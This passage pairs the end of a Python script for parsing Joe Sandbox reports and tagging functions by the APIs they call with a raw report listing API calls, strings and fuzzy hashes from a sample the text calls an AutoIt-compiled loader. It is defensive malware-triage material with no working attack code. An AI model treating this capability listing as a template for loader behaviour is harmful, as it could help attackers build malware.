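• Opcode Fuzzy Hash: 20509a5ee14743f37030217449c33cd4c9d95ce92e753f50bc1ec11f17dee9ea
"""

# "• Name.MODULE(args), ref: ADDR"; CRT refs carry no argument list and may be
# prefixed with "Part of subcall function ADDR:" as in the report's indented lines.
CALL_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s+)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$"
)
SECTIONS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# List-view message numbers from CommCtrl.h (LVM_FIRST = 0x1000).
LVM_MESSAGES = {0x1004: "LVM_GETITEMCOUNT", 0x101F: "LVM_GETHEADER", 0x104D: "LVM_INSERTITEMW"}

# Hypothetical triage rules (not Joe Sandbox signatures): a tag applies when
# the function references every API in the set.
CAPABILITY_RULES = {
    "local-ip-enumeration": {"gethostname", "gethostbyname", "inet_ntoa"},
    "execution-delay": {"Sleep"},
    "menu-manipulation": {"GetMenuItemInfoW", "SetMenuItemInfoW"},
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list            # hex strings as printed; "?" where Joe could not resolve
    ref: str              # call-site address
    subcall_of: str = ""  # address of the subcall the reference belongs to


@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # "API ID", "Opcode Fuzzy Hash", ...

    @property
    def api_names(self) -> set:
        return {c.name for c in self.calls}


def parse_entries(text: str) -> list:
    """One FunctionEntry per 'APIs' block; other sections become key/value meta."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur, section = FunctionEntry(), "APIs"
            entries.append(cur)
        elif line in SECTIONS:
            section = line
        elif cur is not None and line.startswith("•"):
            if section == "APIs":
                m = CALL_RE.match(line)
                if m:
                    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                    cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"] or ""))
            else:
                key, _, value = line[1:].partition(":")
                cur.meta[key.strip()] = value.strip()
    return entries


def decode_messages(entry: FunctionEntry) -> list:
    """(call site, message name) for each SendMessageW whose uMsg was resolved."""
    out = []
    for c in entry.calls:
        if c.name == "SendMessageW" and len(c.args) > 1 and c.args[1] != "?":
            msg = int(c.args[1], 16)
            out.append((c.ref, LVM_MESSAGES.get(msg, f"0x{msg:04X}")))
    return out


def triage(entry: FunctionEntry) -> list:
    tags = [t for t, need in CAPABILITY_RULES.items() if need <= entry.api_names]
    if any(name.startswith("LVM_") for _, name in decode_messages(entry)):
        tags.append("listview-control")
    return sorted(tags)
```

Pointed at the text of a whole report, parse_entries tags every function the same way; the Opcode Fuzzy Hash values kept in meta are what you would feed into a similarity index to find the same routine in other samples, which for an AutoIt-compiled loader like this one mostly means the AutoIt runtime itself rather than the payload.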
                                                                                                                                                                                                                                                      APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00EF94FE
• SafeArrayAllocData.OLEAUT32(?), ref: 00EF9549
• VariantInit.OLEAUT32(?), ref: 00EF955B
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00EF957B
• VariantCopy.OLEAUT32(?,?), ref: 00EF95BE
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00EF95D2
• VariantClear.OLEAUT32(?), ref: 00EF95E7
• SafeArrayDestroyData.OLEAUT32(?), ref: 00EF95F4
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EF95FD
• VariantClear.OLEAUT32(?), ref: 00EF960F
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EF961A
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
APIs
  • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
  • Part of subcall function 00EC936C: __itow.LIBCMT ref: 00EC93DF
• CoInitialize.OLE32 ref: 00F1ADF6
• CoUninitialize.OLE32 ref: 00F1AE01
• CoCreateInstance.OLE32(?,00000000,00000017,00F4D8FC,?), ref: 00F1AE61
• IIDFromString.OLE32(?,?), ref: 00F1AED4
• VariantInit.OLEAUT32(?), ref: 00F1AF6E
• VariantClear.OLEAUT32(?), ref: 00F1AFCF
Strings
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00F18168
• inet_addr.WSOCK32(?), ref: 00F181AD
• gethostbyname.WSOCK32(?), ref: 00F181B9
• IcmpCreateFile.IPHLPAPI ref: 00F181C7
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F18237
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F1824D
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F182C2
• WSACleanup.WSOCK32 ref: 00F182C8
Strings
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00F0E396
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F0E40C
• GetLastError.KERNEL32 ref: 00F0E416
• SetErrorMode.KERNEL32(00000000,READY), ref: 00F0E483
Strings
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
APIs
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00EFB98C
• GetDlgCtrlID.USER32 ref: 00EFB997
• GetParent.USER32 ref: 00EFB9B3
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00EFB9B6
• GetDlgCtrlID.USER32(?), ref: 00EFB9BF
• GetParent.USER32(?), ref: 00EFB9DB
• SendMessageW.USER32(00000000,?,?,00000111), ref: 00EFB9DE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: MessageSend$CtrlParent
• String ID: ComboBox$ListBox
• API String ID: 1383977212-1403004172
• Opcode ID: a3ea043840d25b2cc9846e7fd147f65bff603a08a7af2eaa42a7a5bc7816c3e9
• Instruction ID: 60d96975f6e701aa63b2f5aedefadbf8db15cb1e1ef7bb1ac86c60b8063ac5e9
• Opcode Fuzzy Hash: a3ea043840d25b2cc9846e7fd147f65bff603a08a7af2eaa42a7a5bc7816c3e9
• Instruction Fuzzy Hash: F821C874A0010CBFDB04ABA4CC95EFEBBB5EF5A310F104119FA55A72D1DBB55816EB20
APIs
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00EFBA73
• GetDlgCtrlID.USER32 ref: 00EFBA7E
• GetParent.USER32 ref: 00EFBA9A
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00EFBA9D
• GetDlgCtrlID.USER32(?), ref: 00EFBAA6
• GetParent.USER32(?), ref: 00EFBAC2
• SendMessageW.USER32(00000000,?,?,00000111), ref: 00EFBAC5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: MessageSend$CtrlParent
• String ID: ComboBox$ListBox
• API String ID: 1383977212-1403004172
• Opcode ID: 3966aacda7c72bf141dcf5de4f9420e86eb16db84bcfc985056d3eb44e9c1038
• Instruction ID: c8488d53e38826de0326aec65edca021db871af2d83b3b30a6429591c617c8e1
• Opcode Fuzzy Hash: 3966aacda7c72bf141dcf5de4f9420e86eb16db84bcfc985056d3eb44e9c1038
• Instruction Fuzzy Hash: CC21C5B4A0010CBFDB01AFA4CC85FFEBBB9EF59300F144019FA55A3291DB759916AB20
APIs
• GetParent.USER32 ref: 00EFBAE3
• GetClassNameW.USER32(00000000,?,00000100), ref: 00EFBAF8
• _wcscmp.LIBCMT ref: 00EFBB0A
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00EFBB85
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: ClassMessageNameParentSend_wcscmp
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1704125052-3381328864
• Opcode ID: 21b7eda953b679638b51a2e0497d816b31ab80b3712852e0e71a85cd63a5ba51
• Instruction ID: aca0aa4c20fa47c3f48e8d98a3fa274648698aa5dba3b69bfc5cf3db8c4e2fdd
• Opcode Fuzzy Hash: 21b7eda953b679638b51a2e0497d816b31ab80b3712852e0e71a85cd63a5ba51
• Instruction Fuzzy Hash: 6011297A70834FF9FA206635DC07DB637ACDB21324B205022FA08F40D5FFA5E851A515
APIs
• VariantInit.OLEAUT32(?), ref: 00F1B2D5
• CoInitialize.OLE32(00000000), ref: 00F1B302
• CoUninitialize.OLE32 ref: 00F1B30C
• GetRunningObjectTable.OLE32(00000000,?), ref: 00F1B40C
• SetErrorMode.KERNEL32(00000001,00000029), ref: 00F1B539
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00F1B56D
• CoGetObject.OLE32(?,00000000,00F4D91C,?), ref: 00F1B590
• SetErrorMode.KERNEL32(00000000), ref: 00F1B5A3
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F1B623
• VariantClear.OLEAUT32(00F4D91C), ref: 00F1B633
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• String ID:
• API String ID: 2395222682-0
• Opcode ID: 4284f5a87bca566932890a964214433a66e5348e1f039b89d55985f8aa4bb5c5
• Instruction ID: e448898b77d377cf097392560d43383b63beadac27bd213a81029af19cd8045c
• Opcode Fuzzy Hash: 4284f5a87bca566932890a964214433a66e5348e1f039b89d55985f8aa4bb5c5
• Instruction Fuzzy Hash: 56C12371608305EFC700DF68C884A6ABBE9BF89304F04495DF98ADB261DB71ED46DB52
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F067FD
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0680A
                                                                                                                                                                                                                                                        • Part of subcall function 00EE172B: __woutput_l.LIBCMT ref: 00EE1784
                                                                                                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00F06834
                                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00F06840
                                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00F0684D
                                                                                                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 00F0686D
                                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00F0687F
                                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00F0688E
                                                                                                                                                                                                                                                      • LockResource.KERNEL32(?), ref: 00F0689A
                                                                                                                                                                                                                                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00F068F9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1433390588-0
                                                                                                                                                                                                                                                      • Opcode ID: db9b5dc6bbf326bfcddac1e80f4af8947fde3e0a7c24d026cfdedbd6272f4dea
                                                                                                                                                                                                                                                      • Instruction ID: 0af2d66fe54ac2755183a684128627158a8d34d77d8456e44fc1b88af7309cad
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db9b5dc6bbf326bfcddac1e80f4af8947fde3e0a7c24d026cfdedbd6272f4dea
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC316EB5A0025AABDB119F61DD49ABE7BACFF09350F048425F902E2190E774DA61FB60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00F04047
                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F030A5,?,00000001), ref: 00F0405B
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00F04062
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F030A5,?,00000001), ref: 00F04071
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F04083
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00F030A5,?,00000001), ref: 00F0409C
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F030A5,?,00000001), ref: 00F040AE
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F030A5,?,00000001), ref: 00F040F3
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00F030A5,?,00000001), ref: 00F04108
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00F030A5,?,00000001), ref: 00F04113
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2156557900-0
                                                                                                                                                                                                                                                      • Opcode ID: 3c20042fd2d36bfbfc5bcbb15d8d217f8ca2f36cc39da6f66b930bc984146dd3
                                                                                                                                                                                                                                                      • Instruction ID: 236395b7609ec5284477f94f0f30341d7564faf18b8faad3c3c3a04a8949cfc5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c20042fd2d36bfbfc5bcbb15d8d217f8ca2f36cc39da6f66b930bc984146dd3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E73193B5900208BFDB11DF54DC45BB977A9BBA6721F118105FE05E62E0CBB4A980BF64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000008), ref: 00EDB496
                                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,000000FF), ref: 00EDB4A0
                                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00EDB4B5
                                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000005), ref: 00EDB4BD
                                                                                                                                                                                                                                                      • GetClientRect.USER32(?), ref: 00F3DD63
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00F3DD7A
                                                                                                                                                                                                                                                      • GetWindowDC.USER32(?), ref: 00F3DD86
                                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00F3DD95
                                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00F3DDA7
                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000005), ref: 00F3DDC5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3430376129-0
                                                                                                                                                                                                                                                      • Opcode ID: 139e785cba956b24c9c8d875b0585899b5495335e3a2401aa4cce95769dc935a
                                                                                                                                                                                                                                                      • Instruction ID: a8f028d8bf41e9020fba00f8f68ce8a2a203d0f50f3ed3fafef6cf5523ff4280
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 139e785cba956b24c9c8d875b0585899b5495335e3a2401aa4cce95769dc935a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB118135500209EFDB116FA4EC08BE93B65EB56335F118221FE66A51E1DB310942FF10
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnumChildWindows.USER32(?,00EFCF50), ref: 00EFCE90
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 3555792229-1603158881
• Opcode ID: 29b20715afe07c4edf36499ce4e02611913851fbab5c6e1046a05129df974548
• Instruction ID: 4bcd599c7e51ed253777283c9b1906794fee7482db465399ee580c2996549a88
• Opcode Fuzzy Hash: 29b20715afe07c4edf36499ce4e02611913851fbab5c6e1046a05129df974548
• Instruction Fuzzy Hash: CA91A230A0014E9ACB18EF60C681BFAFBB5FF44304F70A55AD649B7241DF31699ADB90

APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00EC30DC
• CoUninitialize.OLE32(?,00000000), ref: 00EC3181
• UnregisterHotKey.USER32(?), ref: 00EC32A9
• DestroyWindow.USER32(?), ref: 00F35079
• FreeLibrary.KERNEL32(?), ref: 00F350F8
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F35125
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
• Opcode ID: 5d00c8d0acaf044b0c74693da661cb1cb829713b140460a73fce933bbbac3562
• Instruction ID: ffd83f29e00f4059bc4ca6c1c0e9a05578e354ac3f66c69bcece82a8fd6e7911
• Opcode Fuzzy Hash: 5d00c8d0acaf044b0c74693da661cb1cb829713b140460a73fce933bbbac3562
• Instruction Fuzzy Hash: 939127746002028FC719EF24CA95FA8F3E4BF14714F5492ADE40AA7262DB32AE57DF50

APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00EDCC15
  • Part of subcall function 00EDCCCD: GetClientRect.USER32(?,?), ref: 00EDCCF6
  • Part of subcall function 00EDCCCD: GetWindowRect.USER32(?,?), ref: 00EDCD37
  • Part of subcall function 00EDCCCD: ScreenToClient.USER32(?,?), ref: 00EDCD5F
• GetDC.USER32 ref: 00F3D137
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F3D14A
• SelectObject.GDI32(00000000,00000000), ref: 00F3D158
• SelectObject.GDI32(00000000,00000000), ref: 00F3D16D
• ReleaseDC.USER32(?,00000000), ref: 00F3D175
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F3D200
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: b690d6fc4f82984220395902ab8f2873651ec0bc8faa1e7b11a2498f5f936dc2
• Instruction ID: be3faf28f2713a1279b73c5fec0adf457b868dc7e65f23f8f7bbff6417ef038b
• Opcode Fuzzy Hash: b690d6fc4f82984220395902ab8f2873651ec0bc8faa1e7b11a2498f5f936dc2
• Instruction Fuzzy Hash: DC71E131800209DFDF25EF64DC81AEA7BB5FF48374F24426AED556A2A6D731C842EB50

APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F145FF
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F1462B
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00F1466D
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F14682
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F1468F
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00F146BF
• InternetCloseHandle.WININET(00000000), ref: 00F14706
  • Part of subcall function 00F15052: GetLastError.KERNEL32(?,?,00F143CC,00000000,00000000,00000001), ref: 00F15067
Strings
Memory Dump Source
